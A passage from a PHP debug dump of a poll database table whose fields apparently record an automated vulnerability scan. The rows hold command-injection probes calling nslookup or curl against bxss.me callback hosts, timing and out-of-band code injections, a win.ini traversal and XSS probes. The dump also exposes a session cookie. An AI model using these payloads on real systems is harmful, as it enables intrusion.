'ip1' => '".gethostbyname(lc("hitox"."xpdezgtx5057d.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(86).chr(104).chr(71)."',
'sondage_id' => '2'
),
(int) 4941 => array(
'id' => '5484',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4942 => array(
'id' => '5485',
'ip' => '194.34.233.72',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 4943 => array(
'id' => '5486',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4944 => array(
'id' => '5487',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4945 => array(
'id' => '5488',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4946 => array(
'id' => '5489',
'ip' => '194.34.233.72',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 4947 => array(
'id' => '5490',
'ip' => '194.34.233.72',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 4948 => array(
'id' => '5491',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4949 => array(
'id' => '5492',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4950 => array(
'id' => '5493',
'ip' => '194.34.233.72',
'ip1' => 'gethostbyname(lc('hitel'.'tpalnxipc9f45.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(67).chr(109).chr(73)',
'sondage_id' => '2'
),
(int) 4951 => array(
'id' => '5494',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4952 => array(
'id' => '5495',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4953 => array(
'id' => '5496',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4954 => array(
'id' => '5497',
'ip' => '194.34.233.72',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 4955 => array(
'id' => '5498',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4956 => array(
'id' => '5499',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4957 => array(
'id' => '5500',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4958 => array(
'id' => '5501',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4959 => array(
'id' => '5502',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4960 => array(
'id' => '5503',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4961 => array(
'id' => '5504',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4962 => array(
'id' => '5505',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4963 => array(
'id' => '5506',
'ip' => '194.34.233.72',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 4964 => array(
'id' => '5507',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'&&sleep(27*1000)*taqexq&&'',
'sondage_id' => '2'
),
(int) 4965 => array(
'id' => '5508',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4966 => array(
'id' => '5509',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4967 => array(
'id' => '5510',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201"&&sleep(27*1000)*gnainq&&"',
'sondage_id' => '2'
),
(int) 4968 => array(
'id' => '5511',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4969 => array(
'id' => '5512',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4970 => array(
'id' => '5513',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4971 => array(
'id' => '5514',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'||sleep(27*1000)*hwodth||'',
'sondage_id' => '2'
),
(int) 4972 => array(
'id' => '5515',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4973 => array(
'id' => '5516',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4974 => array(
'id' => '5517',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201"||sleep(27*1000)*ilzecg||"',
'sondage_id' => '2'
),
(int) 4975 => array(
'id' => '5518',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4976 => array(
'id' => '5519',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4977 => array(
'id' => '5520',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4978 => array(
'id' => '5521',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4979 => array(
'id' => '5522',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4980 => array(
'id' => '5523',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4981 => array(
'id' => '5524',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4982 => array(
'id' => '5525',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4983 => array(
'id' => '5526',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4984 => array(
'id' => '5527',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4985 => array(
'id' => '5528',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4986 => array(
'id' => '5529',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4987 => array(
'id' => '5530',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4988 => array(
'id' => '5531',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4989 => array(
'id' => '5532',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4990 => array(
'id' => '5533',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4991 => array(
'id' => '5534',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4992 => array(
'id' => '5535',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4993 => array(
'id' => '5536',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4994 => array(
'id' => '5537',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4995 => array(
'id' => '5538',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4996 => array(
'id' => '5539',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4997 => array(
'id' => '5540',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4998 => array(
'id' => '5541',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4999 => array(
'id' => '5542',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5000 => array(
'id' => '5543',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5001 => array(
'id' => '5544',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5002 => array(
'id' => '5545',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5003 => array(
'id' => '5546',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5004 => array(
'id' => '5547',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5005 => array(
'id' => '5548',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5006 => array(
'id' => '5549',
'ip' => '194.34.233.72',
'ip1' => 'echo pblfnt$()\ vbetng\nz^xyu||a #' &echo pblfnt$()\ vbetng\nz^xyu||a #|" &echo pblfnt$()\ vbetng\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 5007 => array(
'id' => '5550',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5008 => array(
'id' => '5551',
'ip' => '194.34.233.72',
'ip1' => '&echo ymxduv$()\ legdwl\nz^xyu||a #' &echo ymxduv$()\ legdwl\nz^xyu||a #|" &echo ymxduv$()\ legdwl\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 5009 => array(
'id' => '5552',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5010 => array(
'id' => '5553',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5011 => array(
'id' => '5554',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5012 => array(
'id' => '5555',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5013 => array(
'id' => '5556',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5014 => array(
'id' => '5557',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5015 => array(
'id' => '5558',
'ip' => 'https://bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5016 => array(
'id' => '5559',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5017 => array(
'id' => '5560',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5018 => array(
'id' => '5561',
'ip' => 'https://bxss.me/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5019 => array(
'id' => '5562',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5020 => array(
'id' => '5563',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5021 => array(
'id' => '5564',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5022 => array(
'id' => '5565',
'ip' => 'https://bxss.me/\',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5023 => array(
'id' => '5566',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5024 => array(
'id' => '5567',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5025 => array(
'id' => '5568',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5026 => array(
'id' => '5569',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5027 => array(
'id' => '5570',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201&echo zfmfdv$()\ bjyija\nz^xyu||a #' &echo zfmfdv$()\ bjyija\nz^xyu||a #|" &echo zfmfdv$()\ bjyija\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 5028 => array(
'id' => '5571',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5029 => array(
'id' => '5572',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5030 => array(
'id' => '5573',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5031 => array(
'id' => '5574',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5032 => array(
'id' => '5575',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5033 => array(
'id' => '5576',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5034 => array(
'id' => '5577',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5035 => array(
'id' => '5578',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5036 => array(
'id' => '5579',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5037 => array(
'id' => '5580',
'ip' => '194.34.233.72',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 5038 => array(
'id' => '5581',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5039 => array(
'id' => '5582',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5040 => array(
'id' => '5583',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5041 => array(
'id' => '5584',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5042 => array(
'id' => '5585',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5043 => array(
'id' => '5586',
'ip' => '194.34.233.72',
'ip1' => '|echo biudui$()\ ifliqq\nz^xyu||a #' |echo biudui$()\ ifliqq\nz^xyu||a #|" |echo biudui$()\ ifliqq\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 5044 => array(
'id' => '5587',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5045 => array(
'id' => '5588',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5046 => array(
'id' => '5589',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5047 => array(
'id' => '5590',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5048 => array(
'id' => '5591',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201|echo xmtczq$()\ nwebxh\nz^xyu||a #' |echo xmtczq$()\ nwebxh\nz^xyu||a #|" |echo xmtczq$()\ nwebxh\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 5049 => array(
'id' => '5592',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5050 => array(
'id' => '5593',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5051 => array(
'id' => '5594',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5052 => array(
'id' => '5595',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5053 => array(
'id' => '5596',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5054 => array(
'id' => '5597',
'ip' => '194.34.233.72',
'ip1' => '(nslookup -q=cname hitjrdztmdujc04149.bxss.me||curl hitjrdztmdujc04149.bxss.me))',
'sondage_id' => '2'
),
(int) 5055 => array(
'id' => '5598',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5056 => array(
'id' => '5599',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5057 => array(
'id' => '5600',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5058 => array(
'id' => '5601',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5059 => array(
'id' => '5602',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5060 => array(
'id' => '5603',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5061 => array(
'id' => '5604',
'ip' => '194.34.233.72',
'ip1' => '$(nslookup -q=cname hitecfrknstmp357db.bxss.me||curl hitecfrknstmp357db.bxss.me)',
'sondage_id' => '2'
),
(int) 5062 => array(
'id' => '5605',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5063 => array(
'id' => '5606',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5064 => array(
'id' => '5607',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5065 => array(
'id' => '5608',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5066 => array(
'id' => '5609',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5067 => array(
'id' => '5610',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5068 => array(
'id' => '5611',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5069 => array(
'id' => '5612',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5070 => array(
'id' => '5613',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5071 => array(
'id' => '5614',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5072 => array(
'id' => '5615',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5073 => array(
'id' => '5616',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5074 => array(
'id' => '5617',
'ip' => 'xfs.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5075 => array(
'id' => '5618',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5076 => array(
'id' => '5619',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5077 => array(
'id' => '5620',
'ip' => '194.34.233.72',
'ip1' => '&nslookup -q=cname hitrctkpeogku561fb.bxss.me&'\"`0&nslookup -q=cname hitrctkpeogku561fb.bxss.me&`'',
'sondage_id' => '2'
),
(int) 5078 => array(
'id' => '5621',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5079 => array(
'id' => '5622',
'ip' => '194.34.233.72',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 5080 => array(
'id' => '5623',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5081 => array(
'id' => '5624',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5082 => array(
'id' => '5625',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5083 => array(
'id' => '5626',
'ip' => '194.34.233.72',
'ip1' => '&(nslookup -q=cname hitmhdilgmzwoa3e7a.bxss.me||curl hitmhdilgmzwoa3e7a.bxss.me)&'\"`0&(nslookup -q=cname hitmhdilgmzwoa3e7a.bxss.me||curl hitmhdilgmzwoa3e7a.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 5084 => array(
'id' => '5627',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5085 => array(
'id' => '5628',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5086 => array(
'id' => '5629',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5087 => array(
'id' => '5630',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5088 => array(
'id' => '5631',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5089 => array(
'id' => '5632',
'ip' => ''"',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5090 => array(
'id' => '5633',
'ip' => '194.34.233.72',
'ip1' => '|(nslookup -q=cname hitjhybnbbnrjbda18.bxss.me||curl hitjhybnbbnrjbda18.bxss.me)',
'sondage_id' => '2'
),
(int) 5091 => array(
'id' => '5634',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5092 => array(
'id' => '5635',
'ip' => '194.34.233.72',
'ip1' => '`(nslookup -q=cname hitugunzvxcvsbbf17.bxss.me||curl hitugunzvxcvsbbf17.bxss.me)`',
'sondage_id' => '2'
),
(int) 5093 => array(
'id' => '5636',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5094 => array(
'id' => '5637',
'ip' => '<!--',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5095 => array(
'id' => '5638',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5096 => array(
'id' => '5639',
'ip' => '194.34.233.72',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(122).concat(75).concat(105).concat(80)+(require"socket"
Socket.gethostbyname("hitlj"+"dfjtiecm79893.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 5097 => array(
'id' => '5640',
'ip' => '194.34.233.72',
'ip1' => ';(nslookup -q=cname hitscgfrwvrzj96718.bxss.me||curl hitscgfrwvrzj96718.bxss.me)|(nslookup -q=cname hitscgfrwvrzj96718.bxss.me||curl hitscgfrwvrzj96718.bxss.me)&(nslookup -q=cname hitscgfrwvrzj96718.bxss.me||curl hitscgfrwvrzj96718.bxss.me)',
'sondage_id' => '2'
),
(int) 5098 => array(
'id' => '5641',
'ip' => '194.34.233.72',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 5099 => array(
'id' => '5642',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5100 => array(
'id' => '5643',
'ip' => '194.34.233.72',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitwvgoucmvur2324b.bxss.me||curl${IFS}hitwvgoucmvur2324b.bxss.me)',
'sondage_id' => '2'
),
(int) 5101 => array(
'id' => '5644',
'ip' => '194.34.233.72',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(115).concat(84).concat(103).concat(72)+(require'socket'
Socket.gethostbyname('hitnu'+'rqajgzxk26d3e.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 5102 => array(
'id' => '5645',
'ip' => '194.34.233.72',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 5103 => array(
'id' => '5646',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5104 => array(
'id' => '5647',
'ip' => '194.34.233.72',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitqbyjihtfdy9ee6e.bxss.me||curl${IFS}hitqbyjihtfdy9ee6e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqbyjihtfdy9ee6e.bxss.me||curl${IFS}hitqbyjihtfdy9ee6e.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 5105 => array(
'id' => '5648',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5106 => array(
